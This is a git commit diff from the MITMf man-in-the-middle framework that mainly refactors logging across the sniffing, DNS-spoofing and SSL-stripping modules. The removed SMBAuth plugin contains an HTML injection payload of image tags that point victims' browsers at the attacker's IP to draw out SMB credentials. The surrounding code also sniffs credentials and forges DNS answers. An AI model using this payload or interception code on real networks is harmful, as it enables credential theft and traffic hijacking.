mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 21:42:17 -07:00
Revamped logging , plugins will be re-added later once refactored
This commit is contained in:
parent
fb0e8a3762
commit
ff0ada2a39
34 changed files with 351 additions and 2352 deletions
|
@ -1,46 +1,48 @@
|
||||||
#!/usr/bin/env python2.7
|
#!/usr/bin/env python2.7
|
||||||
|
|
||||||
|
# Copyright (c) 2014-2016 Marcello Salvati
|
||||||
|
#
|
||||||
|
# This program is free software; you can redistribute it and/or
|
||||||
|
# modify it under the terms of the GNU General Public License as
|
||||||
|
# published by the Free Software Foundation; either version 3 of the
|
||||||
|
# License, or (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful, but
|
||||||
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||||
|
# General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program; if not, write to the Free Software
|
||||||
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||||
|
# USA
|
||||||
|
#
|
||||||
|
|
||||||
import logging
|
import logging
|
||||||
|
|
||||||
from mitmflib.watchdog.observers import Observer
|
from mitmflib.watchdog.observers import Observer
|
||||||
from mitmflib.watchdog.events import FileSystemEventHandler
|
from mitmflib.watchdog.events import FileSystemEventHandler
|
||||||
from configobj import ConfigObj
|
from configobj import ConfigObj
|
||||||
|
|
||||||
logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages
|
logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger('mitmf')
|
log = logging.getLogger('mitmf')
|
||||||
|
|
||||||
class ConfigWatcher(FileSystemEventHandler):
|
class ConfigWatcher(FileSystemEventHandler):
|
||||||
|
|
||||||
_instance = None
|
@property
|
||||||
config = ConfigObj("./config/mitmf.conf")
|
def config(self):
|
||||||
|
return ConfigObj("./config/mitmf.conf")
|
||||||
|
|
||||||
@staticmethod
|
def on_modified(self, event):
|
||||||
def getInstance():
|
log.debug("[{}] Detected configuration changes, reloading!".format(self.name))
|
||||||
if ConfigWatcher._instance is None:
|
self.on_config_change()
|
||||||
ConfigWatcher._instance = ConfigWatcher()
|
|
||||||
|
|
||||||
return ConfigWatcher._instance
|
def start_config_watch(self):
|
||||||
|
|
||||||
def startConfigWatch(self):
|
|
||||||
observer = Observer()
|
observer = Observer()
|
||||||
observer.schedule(self, path='./config', recursive=False)
|
observer.schedule(self, path='./config', recursive=False)
|
||||||
observer.start()
|
observer.start()
|
||||||
|
|
||||||
def getConfig(self):
|
def on_config_change(self):
|
||||||
return self.config
|
|
||||||
|
|
||||||
def on_modified(self, event):
|
|
||||||
mitmf_logger.debug("[{}] Detected configuration changes, reloading!".format(self.__class__.__name__))
|
|
||||||
self.reloadConfig()
|
|
||||||
self.onConfigChange()
|
|
||||||
|
|
||||||
def onConfigChange(self):
|
|
||||||
""" We can subclass this function to do stuff after the config file has been modified"""
|
""" We can subclass this function to do stuff after the config file has been modified"""
|
||||||
pass
|
pass
|
||||||
|
|
||||||
def reloadConfig(self):
|
|
||||||
try:
|
|
||||||
self.config = ConfigObj("./config/mitmf.conf")
|
|
||||||
except Exception as e:
|
|
||||||
mitmf_logger.error("Error reloading config file: {}".format(e))
|
|
||||||
pass
|
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
#! /usr/bin/env python2.7
|
#! /usr/bin/env python2.7
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
# Copyright (c) 2014-2016 Marcello Salvati
|
||||||
#
|
#
|
||||||
|
@ -18,24 +19,28 @@
|
||||||
# USA
|
# USA
|
||||||
#
|
#
|
||||||
|
|
||||||
from core.utils import SystemConfig
|
import logging
|
||||||
from plugins.plugin import Plugin
|
import sys
|
||||||
from plugins.Inject import Inject
|
|
||||||
|
|
||||||
class SMBAuth(Inject, Plugin):
|
|
||||||
name = "SMBAuth"
|
|
||||||
optname = "smbauth"
|
|
||||||
desc = "Evoke SMB challenge-response auth attempts"
|
|
||||||
version = "0.1"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
class logger:
|
||||||
self.target_ip = SystemConfig.getIP(options.interface)
|
|
||||||
|
|
||||||
Inject.initialize(self, options)
|
log_level = None
|
||||||
self.html_payload = self._get_data()
|
__shared_state = {}
|
||||||
|
|
||||||
def _get_data(self):
|
def __init__(self):
|
||||||
return '<img src=\"\\\\%s\\image.jpg\">'\
|
self.__dict__ = self.__shared_state
|
||||||
'<img src=\"file://///%s\\image.jpg\">'\
|
|
||||||
'<img src=\"moz-icon:file:///%%5c/%s\\image.jpg\">' % tuple([self.target_ip]*3)
|
def setup_logger(self, name, formatter, logfile='./logs/mitmf.log'):
|
||||||
|
fileHandler = logging.FileHandler(logfile)
|
||||||
|
fileHandler.setFormatter(formatter)
|
||||||
|
streamHandler = logging.StreamHandler(sys.stdout)
|
||||||
|
streamHandler.setFormatter(formatter)
|
||||||
|
|
||||||
|
logger = logging.getLogger(name)
|
||||||
|
logger.propagate = False
|
||||||
|
logger.addHandler(streamHandler)
|
||||||
|
logger.addHandler(fileHandler)
|
||||||
|
logger.setLevel(self.log_level)
|
||||||
|
|
||||||
|
return logger
|
|
@ -20,7 +20,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
||||||
from scapy.all import *
|
from scapy.all import *
|
||||||
conf.verb=0
|
conf.verb=0
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger('mitmf')
|
log = logging.getLogger('mitmf')
|
||||||
|
|
||||||
DN = open(devnull, 'w')
|
DN = open(devnull, 'w')
|
||||||
pkt_frag_loads = OrderedDict()
|
pkt_frag_loads = OrderedDict()
|
||||||
|
@ -47,13 +47,11 @@ class NetCreds:
|
||||||
|
|
||||||
version = "1.0"
|
version = "1.0"
|
||||||
|
|
||||||
def sniffer(self, myip, interface):
|
def sniffer(self, interface):
|
||||||
#set the filter to our ip to prevent capturing traffic coming/going from our box
|
sniff(iface=interface, prn=pkt_parser, store=0)
|
||||||
sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(myip), store=0)
|
|
||||||
#sniff(iface=interface, prn=pkt_parser, store=0)
|
|
||||||
|
|
||||||
def start(self, myip, interface):
|
def start(self, interface):
|
||||||
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, myip,))
|
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface,))
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
|
|
||||||
|
@ -903,7 +901,7 @@ def printer(src_ip_port, dst_ip_port, msg):
|
||||||
print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
|
print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
|
||||||
# All credentials will have dst_ip_port, URLs will not
|
# All credentials will have dst_ip_port, URLs will not
|
||||||
|
|
||||||
mitmf_logger.info("[NetCreds] {}".format(print_str))
|
log.info("[NetCreds] {}".format(print_str))
|
||||||
else:
|
else:
|
||||||
print_str = '[{}] {}'.format(src_ip_port.split(':')[0], msg)
|
print_str = '[{}] {}'.format(src_ip_port.split(':')[0], msg)
|
||||||
mitmf_logger.info("[NetCreds] {}".format(print_str))
|
log.info("[NetCreds] {}".format(print_str))
|
||||||
|
|
|
@ -21,7 +21,7 @@ import logging
|
||||||
import inspect
|
import inspect
|
||||||
import traceback
|
import traceback
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
log = logging.getLogger('mitmf')
|
||||||
|
|
||||||
class ProxyPlugins:
|
class ProxyPlugins:
|
||||||
'''
|
'''
|
||||||
|
@ -44,11 +44,11 @@ class ProxyPlugins:
|
||||||
_instance = None
|
_instance = None
|
||||||
|
|
||||||
plist = []
|
plist = []
|
||||||
mthdDict = {"connectionMade": "clientRequest",
|
mthdDict = {"connectionMade" : "request",
|
||||||
"handleStatus": "serverResponseStatus",
|
"handleStatus" : "responsestatus",
|
||||||
"handleResponse": "serverResponse",
|
"handleResponse" : "response",
|
||||||
"handleHeader": "serverHeaders",
|
"handleHeader" : "responseheaders",
|
||||||
"handleEndHeaders":"serverHeaders"}
|
"handleEndHeaders": "responseheaders"}
|
||||||
|
|
||||||
pmthds = {}
|
pmthds = {}
|
||||||
|
|
||||||
|
@ -65,12 +65,12 @@ class ProxyPlugins:
|
||||||
for p in plugins:
|
for p in plugins:
|
||||||
self.addPlugin(p)
|
self.addPlugin(p)
|
||||||
|
|
||||||
mitmf_logger.debug("[ProxyPlugins] Loaded {} plugin/s".format(len(self.plist)))
|
log.debug("[ProxyPlugins] Loaded {} plugin/s".format(len(self.plist)))
|
||||||
|
|
||||||
def addPlugin(self,p):
|
def addPlugin(self,p):
|
||||||
'''Load a plugin'''
|
'''Load a plugin'''
|
||||||
self.plist.append(p)
|
self.plist.append(p)
|
||||||
mitmf_logger.debug("[ProxyPlugins] Adding {} plugin".format(p.name))
|
log.debug("[ProxyPlugins] Adding {} plugin".format(p.name))
|
||||||
for mthd,pmthd in self.mthdDict.iteritems():
|
for mthd,pmthd in self.mthdDict.iteritems():
|
||||||
try:
|
try:
|
||||||
self.pmthds[mthd].append(getattr(p,pmthd))
|
self.pmthds[mthd].append(getattr(p,pmthd))
|
||||||
|
@ -80,7 +80,7 @@ class ProxyPlugins:
|
||||||
def removePlugin(self,p):
|
def removePlugin(self,p):
|
||||||
'''Unload a plugin'''
|
'''Unload a plugin'''
|
||||||
self.plist.remove(p)
|
self.plist.remove(p)
|
||||||
mitmf_logger.debug("[ProxyPlugins] Removing {} plugin".format(p.name))
|
log.debug("[ProxyPlugins] Removing {} plugin".format(p.name))
|
||||||
for mthd,pmthd in self.mthdDict.iteritems():
|
for mthd,pmthd in self.mthdDict.iteritems():
|
||||||
self.pmthds[mthd].remove(p)
|
self.pmthds[mthd].remove(p)
|
||||||
|
|
||||||
|
@ -105,7 +105,7 @@ class ProxyPlugins:
|
||||||
|
|
||||||
del args['self']
|
del args['self']
|
||||||
|
|
||||||
mitmf_logger.debug("[ProxyPlugins] hooking {}()".format(fname))
|
log.debug("[ProxyPlugins] hooking {}()".format(fname))
|
||||||
#calls any plugin that has this hook
|
#calls any plugin that has this hook
|
||||||
try:
|
try:
|
||||||
for f in self.pmthds[fname]:
|
for f in self.pmthds[fname]:
|
||||||
|
@ -115,7 +115,7 @@ class ProxyPlugins:
|
||||||
pass
|
pass
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
#This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
|
#This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
|
||||||
mitmf_logger.error("[ProxyPlugins] Exception occurred in hooked function")
|
log.error("[ProxyPlugins] Exception occurred in hooked function")
|
||||||
traceback.print_exc()
|
traceback.print_exc()
|
||||||
|
|
||||||
#pass our changes to the locals back down
|
#pass our changes to the locals back down
|
||||||
|
|
|
@ -46,11 +46,7 @@ from core.utils import shutdown
|
||||||
from mitmflib.dnslib import *
|
from mitmflib.dnslib import *
|
||||||
from IPy import IP
|
from IPy import IP
|
||||||
|
|
||||||
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
log = logging.getLogger('mitmf')
|
||||||
dnschef_logger = logging.getLogger('dnschef')
|
|
||||||
fileHandler = logging.FileHandler("./logs/dnschef/dnschef.log")
|
|
||||||
fileHandler.setFormatter(formatter)
|
|
||||||
dnschef_logger.addHandler(fileHandler)
|
|
||||||
|
|
||||||
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
|
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
|
||||||
# calculate an appropriate response based on user parameters.
|
# calculate an appropriate response based on user parameters.
|
||||||
|
@ -70,8 +66,8 @@ class DNSHandler():
|
||||||
# Parse data as DNS
|
# Parse data as DNS
|
||||||
d = DNSRecord.parse(data)
|
d = DNSRecord.parse(data)
|
||||||
|
|
||||||
except Exception, e:
|
except Exception as e:
|
||||||
dnschef_logger.info("{} [DNSChef] Error: invalid DNS request".format(self.client_address[0]))
|
log.info("{} [DNSChef] Error: invalid DNS request".format(self.client_address[0]))
|
||||||
|
|
||||||
else:
|
else:
|
||||||
# Only Process DNS Queries
|
# Only Process DNS Queries
|
||||||
|
@ -115,7 +111,7 @@ class DNSHandler():
|
||||||
# Create a custom response to the query
|
# Create a custom response to the query
|
||||||
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
|
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
|
||||||
|
|
||||||
dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record))
|
log.info("{} [DNSChef] Cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record))
|
||||||
|
|
||||||
# IPv6 needs additional work before inclusion:
|
# IPv6 needs additional work before inclusion:
|
||||||
if qtype == "AAAA":
|
if qtype == "AAAA":
|
||||||
|
@ -184,7 +180,7 @@ class DNSHandler():
|
||||||
response = response.pack()
|
response = response.pack()
|
||||||
|
|
||||||
elif qtype == "*" and not None in fake_records.values():
|
elif qtype == "*" and not None in fake_records.values():
|
||||||
dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records."))
|
log.info("{} [DNSChef] Cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records."))
|
||||||
|
|
||||||
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
|
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
|
||||||
|
|
||||||
|
@ -259,7 +255,7 @@ class DNSHandler():
|
||||||
|
|
||||||
# Proxy the request
|
# Proxy the request
|
||||||
else:
|
else:
|
||||||
dnschef_logger.debug("{} [DNSChef] Proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname))
|
log.debug("{} [DNSChef] Proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname))
|
||||||
|
|
||||||
nameserver_tuple = random.choice(nameservers).split('#')
|
nameserver_tuple = random.choice(nameservers).split('#')
|
||||||
response = self.proxyrequest(data, *nameserver_tuple)
|
response = self.proxyrequest(data, *nameserver_tuple)
|
||||||
|
@ -339,13 +335,13 @@ class DNSHandler():
|
||||||
sock.close()
|
sock.close()
|
||||||
|
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
dnschef_logger.warning("[DNSChef] Could not proxy request: {}".format(e))
|
log.warning("[DNSChef] Could not proxy request: {}".format(e))
|
||||||
else:
|
else:
|
||||||
return reply
|
return reply
|
||||||
|
|
||||||
def hstsbypass(self, real_domain, fake_domain, nameservers, d):
|
def hstsbypass(self, real_domain, fake_domain, nameservers, d):
|
||||||
|
|
||||||
dnschef_logger.info("{} [DNSChef] Resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain))
|
log.info("{} [DNSChef] Resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain))
|
||||||
|
|
||||||
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
|
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
|
||||||
|
|
||||||
|
@ -435,7 +431,7 @@ class DNSChef(ConfigWatcher):
|
||||||
|
|
||||||
return DNSChef._instance
|
return DNSChef._instance
|
||||||
|
|
||||||
def onConfigChange(self):
|
def on_config_change(self):
|
||||||
config = self.config['MITMf']['DNS']
|
config = self.config['MITMf']['DNS']
|
||||||
|
|
||||||
self.port = int(config['port'])
|
self.port = int(config['port'])
|
||||||
|
@ -472,8 +468,8 @@ class DNSChef(ConfigWatcher):
|
||||||
self.hsts = True
|
self.hsts = True
|
||||||
|
|
||||||
def start(self):
|
def start(self):
|
||||||
self.onConfigChange()
|
self.on_config_change()
|
||||||
self.startConfigWatch()
|
self.start_config_watch()
|
||||||
|
|
||||||
try:
|
try:
|
||||||
if self.config['MITMf']['DNS']['tcp'].lower() == 'on':
|
if self.config['MITMf']['DNS']['tcp'].lower() == 'on':
|
||||||
|
|
|
@ -9,15 +9,16 @@ from core.servers.smb.KarmaSMB import KarmaSMBServer
|
||||||
from core.configwatcher import ConfigWatcher
|
from core.configwatcher import ConfigWatcher
|
||||||
from core.utils import shutdown
|
from core.utils import shutdown
|
||||||
|
|
||||||
#Logging is something I'm going to have to clean up in the future
|
|
||||||
|
|
||||||
class SMBserver(ConfigWatcher):
|
class SMBserver(ConfigWatcher):
|
||||||
|
|
||||||
_instance = None
|
_instance = None
|
||||||
impacket_ver = version.VER_MINOR
|
|
||||||
server_type = ConfigWatcher.config["MITMf"]["SMB"]["type"].lower()
|
def __init__(self):
|
||||||
smbchallenge = ConfigWatcher.config["MITMf"]["SMB"]["Challenge"]
|
|
||||||
smb_port = int(ConfigWatcher.config["MITMf"]["SMB"]["port"])
|
self.impacket_ver = version.VER_MINOR
|
||||||
|
self.server_type = self.config["MITMf"]["SMB"]["type"].lower()
|
||||||
|
self.smbchallenge = self.config["MITMf"]["SMB"]["Challenge"]
|
||||||
|
self.smb_port = int(self.config["MITMf"]["SMB"]["port"])
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def getInstance():
|
def getInstance():
|
||||||
|
|
|
@ -40,7 +40,7 @@ from URLMonitor import URLMonitor
|
||||||
from CookieCleaner import CookieCleaner
|
from CookieCleaner import CookieCleaner
|
||||||
from DnsCache import DnsCache
|
from DnsCache import DnsCache
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger('mitmf')
|
log = logging.getLogger('mitmf')
|
||||||
|
|
||||||
class ClientRequest(Request):
|
class ClientRequest(Request):
|
||||||
|
|
||||||
|
@ -74,24 +74,23 @@ class ClientRequest(Request):
|
||||||
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
|
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
|
||||||
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
|
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
|
||||||
|
|
||||||
if 'if-none-match' in headers:
|
|
||||||
del headers['if-none-match']
|
|
||||||
|
|
||||||
if 'host' in headers:
|
if 'host' in headers:
|
||||||
host = self.urlMonitor.URLgetRealHost(str(headers['host']))
|
host = self.urlMonitor.URLgetRealHost(str(headers['host']))
|
||||||
mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: {} -> {}".format(headers['host'], host))
|
log.debug("[ClientRequest][HSTS] Modifing HOST header: {} -> {}".format(headers['host'], host))
|
||||||
headers['host'] = host
|
headers['host'] = host
|
||||||
self.setHeader('Host', host)
|
self.setHeader('Host', host)
|
||||||
|
|
||||||
if 'accept-encoding' in headers:
|
if 'accept-encoding' in headers:
|
||||||
del headers['accept-encoding']
|
del headers['accept-encoding']
|
||||||
mitmf_logger.debug("[ClientRequest] Zapped encoding")
|
log.debug("[ClientRequest] Zapped encoding")
|
||||||
|
|
||||||
|
if 'if-none-match' in headers:
|
||||||
|
del headers['if-none-match']
|
||||||
|
|
||||||
if 'if-modified-since' in headers:
|
if 'if-modified-since' in headers:
|
||||||
del headers['if-modified-since']
|
del headers['if-modified-since']
|
||||||
|
|
||||||
if 'cache-control' in headers:
|
headers['pragma'] = 'no-cache'
|
||||||
del headers['cache-control']
|
|
||||||
|
|
||||||
return headers
|
return headers
|
||||||
|
|
||||||
|
@ -110,11 +109,11 @@ class ClientRequest(Request):
|
||||||
|
|
||||||
if os.path.exists(scriptPath): return scriptPath
|
if os.path.exists(scriptPath): return scriptPath
|
||||||
|
|
||||||
mitmf_logger.warning("[ClientRequest] Error: Could not find lock.ico")
|
log.warning("[ClientRequest] Error: Could not find lock.ico")
|
||||||
return "lock.ico"
|
return "lock.ico"
|
||||||
|
|
||||||
def handleHostResolvedSuccess(self, address):
|
def handleHostResolvedSuccess(self, address):
|
||||||
mitmf_logger.debug("[ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
|
log.debug("[ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
|
||||||
host = self.getHeader("host")
|
host = self.getHeader("host")
|
||||||
headers = self.cleanHeaders()
|
headers = self.cleanHeaders()
|
||||||
client = self.getClientIP()
|
client = self.getClientIP()
|
||||||
|
@ -152,22 +151,22 @@ class ClientRequest(Request):
|
||||||
self.dnsCache.cacheResolution(hostparts[0], address)
|
self.dnsCache.cacheResolution(hostparts[0], address)
|
||||||
|
|
||||||
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
|
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
|
||||||
mitmf_logger.debug("[ClientRequest] Sending expired cookies")
|
log.debug("[ClientRequest] Sending expired cookies")
|
||||||
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
|
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
|
||||||
|
|
||||||
elif (self.urlMonitor.isSecureFavicon(client, path)):
|
elif (self.urlMonitor.isSecureFavicon(client, path)):
|
||||||
mitmf_logger.debug("[ClientRequest] Sending spoofed favicon response")
|
log.debug("[ClientRequest] Sending spoofed favicon response")
|
||||||
self.sendSpoofedFaviconResponse()
|
self.sendSpoofedFaviconResponse()
|
||||||
|
|
||||||
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
|
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
|
||||||
if 'securelink' in headers:
|
if 'securelink' in headers:
|
||||||
del headers['securelink']
|
del headers['securelink']
|
||||||
|
|
||||||
mitmf_logger.debug("[ClientRequest] Sending request via SSL ({})".format((client,url)))
|
log.debug("[ClientRequest] Sending request via SSL ({})".format((client,url)))
|
||||||
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
|
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
|
||||||
|
|
||||||
else:
|
else:
|
||||||
mitmf_logger.debug("[ClientRequest] Sending request via HTTP")
|
log.debug("[ClientRequest] Sending request via HTTP")
|
||||||
#self.proxyViaHTTP(address, self.method, path, postData, headers)
|
#self.proxyViaHTTP(address, self.method, path, postData, headers)
|
||||||
port = 80
|
port = 80
|
||||||
if len(hostparts) > 1:
|
if len(hostparts) > 1:
|
||||||
|
@ -176,7 +175,7 @@ class ClientRequest(Request):
|
||||||
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
|
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
|
||||||
|
|
||||||
def handleHostResolvedError(self, error):
|
def handleHostResolvedError(self, error):
|
||||||
mitmf_logger.debug("[ClientRequest] Host resolution error: {}".format(error))
|
log.debug("[ClientRequest] Host resolution error: {}".format(error))
|
||||||
try:
|
try:
|
||||||
self.finish()
|
self.finish()
|
||||||
except:
|
except:
|
||||||
|
@ -186,23 +185,23 @@ class ClientRequest(Request):
|
||||||
address = self.dnsCache.getCachedAddress(host)
|
address = self.dnsCache.getCachedAddress(host)
|
||||||
|
|
||||||
if address != None:
|
if address != None:
|
||||||
mitmf_logger.debug("[ClientRequest] Host cached: {} {}".format(host, address))
|
log.debug("[ClientRequest] Host cached: {} {}".format(host, address))
|
||||||
return defer.succeed(address)
|
return defer.succeed(address)
|
||||||
else:
|
else:
|
||||||
|
|
||||||
mitmf_logger.debug("[ClientRequest] Host not cached.")
|
log.debug("[ClientRequest] Host not cached.")
|
||||||
self.customResolver.port = self.urlMonitor.getResolverPort()
|
self.customResolver.port = self.urlMonitor.getResolverPort()
|
||||||
|
|
||||||
try:
|
try:
|
||||||
mitmf_logger.debug("[ClientRequest] Resolving with DNSChef")
|
log.debug("[ClientRequest] Resolving with DNSChef")
|
||||||
address = str(self.customResolver.query(host)[0].address)
|
address = str(self.customResolver.query(host)[0].address)
|
||||||
return defer.succeed(address)
|
return defer.succeed(address)
|
||||||
except Exception:
|
except Exception:
|
||||||
mitmf_logger.debug("[ClientRequest] Exception occured, falling back to Twisted")
|
log.debug("[ClientRequest] Exception occured, falling back to Twisted")
|
||||||
return reactor.resolve(host)
|
return reactor.resolve(host)
|
||||||
|
|
||||||
def process(self):
|
def process(self):
|
||||||
mitmf_logger.debug("[ClientRequest] Resolving host: {}".format(self.getHeader('host')))
|
log.debug("[ClientRequest] Resolving host: {}".format(self.getHeader('host')))
|
||||||
host = self.getHeader('host').split(":")[0]
|
host = self.getHeader('host').split(":")[0]
|
||||||
|
|
||||||
if self.hsts:
|
if self.hsts:
|
||||||
|
|
|
@ -18,7 +18,7 @@
|
||||||
|
|
||||||
import logging
|
import logging
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger('mitmf')
|
log = logging.getLogger('mitmf')
|
||||||
|
|
||||||
class DnsCache:
|
class DnsCache:
|
||||||
|
|
||||||
|
@ -51,7 +51,7 @@ class DnsCache:
|
||||||
def setCustomRes(self, host, ip_address=None):
|
def setCustomRes(self, host, ip_address=None):
|
||||||
if ip_address is not None:
|
if ip_address is not None:
|
||||||
self.cache[host] = ip_address
|
self.cache[host] = ip_address
|
||||||
mitmf_logger.debug("[DNSCache] DNS entry set: %s -> %s" %(host, ip_address))
|
log.debug("[DNSCache] DNS entry set: %s -> %s" %(host, ip_address))
|
||||||
else:
|
else:
|
||||||
if self.customAddress is not None:
|
if self.customAddress is not None:
|
||||||
self.cache[host] = self.customAddress
|
self.cache[host] = self.customAddress
|
||||||
|
|
|
@ -23,7 +23,7 @@ import string
|
||||||
from ServerConnection import ServerConnection
|
from ServerConnection import ServerConnection
|
||||||
from URLMonitor import URLMonitor
|
from URLMonitor import URLMonitor
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger('mitmf')
|
log = logging.getLogger('mitmf')
|
||||||
|
|
||||||
class SSLServerConnection(ServerConnection):
|
class SSLServerConnection(ServerConnection):
|
||||||
|
|
||||||
|
@ -59,11 +59,11 @@ class SSLServerConnection(ServerConnection):
|
||||||
for v in values:
|
for v in values:
|
||||||
if v[:7].lower()==' domain':
|
if v[:7].lower()==' domain':
|
||||||
dominio=v.split("=")[1]
|
dominio=v.split("=")[1]
|
||||||
mitmf_logger.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v)
|
log.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v)
|
||||||
real = self.urlMonitor.real
|
real = self.urlMonitor.real
|
||||||
if dominio in real:
|
if dominio in real:
|
||||||
v=" Domain=%s"%real[dominio]
|
v=" Domain=%s"%real[dominio]
|
||||||
mitmf_logger.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v)
|
log.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v)
|
||||||
newvalues.append(v)
|
newvalues.append(v)
|
||||||
value = ';'.join(newvalues)
|
value = ';'.join(newvalues)
|
||||||
|
|
||||||
|
@ -87,13 +87,13 @@ class SSLServerConnection(ServerConnection):
|
||||||
if ((not link.startswith('http')) and (not link.startswith('/'))):
|
if ((not link.startswith('http')) and (not link.startswith('/'))):
|
||||||
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
|
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
|
||||||
|
|
||||||
mitmf_logger.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link)
|
log.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link)
|
||||||
mitmf_logger.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
|
log.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
|
||||||
elif not link.startswith('http'):
|
elif not link.startswith('http'):
|
||||||
absoluteLink = "http://"+self.headers['host']+link
|
absoluteLink = "http://"+self.headers['host']+link
|
||||||
|
|
||||||
mitmf_logger.debug("[SSLServerConnection] Found relative link in secure transmission: " + link)
|
log.debug("[SSLServerConnection] Found relative link in secure transmission: " + link)
|
||||||
mitmf_logger.debug("[SSLServerConnection] New Absolute link: " + absoluteLink)
|
log.debug("[SSLServerConnection] New Absolute link: " + absoluteLink)
|
||||||
|
|
||||||
if not absoluteLink == "":
|
if not absoluteLink == "":
|
||||||
absoluteLink = absoluteLink.replace('&', '&')
|
absoluteLink = absoluteLink.replace('&', '&')
|
||||||
|
|
|
@ -29,8 +29,10 @@ from mitmflib.user_agents import parse
|
||||||
from twisted.web.http import HTTPClient
|
from twisted.web.http import HTTPClient
|
||||||
from URLMonitor import URLMonitor
|
from URLMonitor import URLMonitor
|
||||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||||
|
from core.logger import logger
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger('mitmf')
|
formatter = logging.Formatter("%(asctime)s %(clientip)s [type:%(browser)s-%(browserv)s os:%(clientos)s] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
||||||
|
log = logger().setup_logger("ServerConnection", formatter)
|
||||||
|
|
||||||
class ServerConnection(HTTPClient):
|
class ServerConnection(HTTPClient):
|
||||||
|
|
